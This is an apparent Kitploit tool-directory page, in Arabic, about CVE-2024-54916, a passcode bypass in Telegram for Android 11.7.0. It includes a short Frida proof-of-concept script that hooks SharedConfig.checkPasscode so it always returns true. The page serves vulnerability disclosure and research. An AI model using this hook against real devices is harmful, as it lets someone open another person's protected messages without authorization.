Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/sahalll/cve-2024-54916
أمان أندرويدالتحليل الديناميكي (عزل)تحليل الثغرات الأمنيةالاستغلالأمن الجوالتحليل الملفات الثنائيةالمصادقة
GitHubsahalll/cve-2024-54916

CVE-2024-54916

إثبات مفهوم قائم على Frida يوضح تجاوز المصادقة في تطبيق Telegram لنظام Android عن طريق ربط SharedConfig.checkPasscode لإرجاع true دائمًا، مما يتيح الوصول غير المصرح به.

عرض المستودع
5منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-54916: تجاوز المصادقة على تطبيق Telegram apk

تسمح مشكلة في فئة SharedConfig الخاصة بـ Telegram Android APK v.11.7.0 لمهاجم قريب جسدياً بتجاوز المصادقة ورفع الامتيازات عن طريق التلاعب بقيمة الإرجاع لطريقة checkPasscode.

نوع الثغرة

تجاوز المصادقة

البائع للمنتج

Telegram

قاعدة كود المنتج المتأثر

Telegram android apk v.11.7.0

المكون المتأثر

org.telegram.messenger.SharedConfig

الاستغلال

تحديد الفئة والطريقة المستهدفة:

  • تقوم فئة SharedConfig في التطبيق بإدارة منطق التحقق من رمز المرور.
  • طريقة checkPasscode داخل هذه الفئة مسؤولة عن تحديد صحة رمز المرور المُدخل.

ربط الطريقة باستخدام frida

  • يتم استخدام سكريبت Frida لربط طريقة checkPasscode في فئة SharedConfig. يتم تعديل تنفيذ الطريقة لتعيد دائمًا true، مما يتجاوز التحقق الفعلي من رمز المرور.

التنفيذ

  • يتم تنفيذ سكريبت Frida بينما التطبيق قيد التشغيل (ديناميكيًا). سيتم قبول أي رمز مرور يُدخله المستخدم على أنه صالح، مما يسمح بالوصول غير المصرح به.

POC

Java.perform(function() {

// Locate the SharedConfig class in the target application

var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');

// Hook the checkPasscode method to modify its behavior

PassCodeActivity.checkPasscode.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true

return true;

};

});

رابط فيديو POC:-

https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing

التأثير:-

هذه الثغرة هي مشكلة تجاوز مصادقة من جهة العميل. تؤثر على المستخدمين الذين يعتمدون على ميزة رمز المرور لتأمين البيانات الحساسة أو تقييد الوصول إلى وظائف تطبيق محددة. من خلال استغلال هذه الثغرة، يمكن لمهاجم قريب جسدياً التلاعب بعملية التحقق من رمز المرور، وتجاوز المصادقة، والحصول على وصول غير مصرح به إلى المناطق المحمية في التطبيق. قد يؤدي ذلك إلى تعرض بيانات المستخدم الحساسة أو إجراءات غير مصرح بها داخل التطبيق.

تنزيل الأداة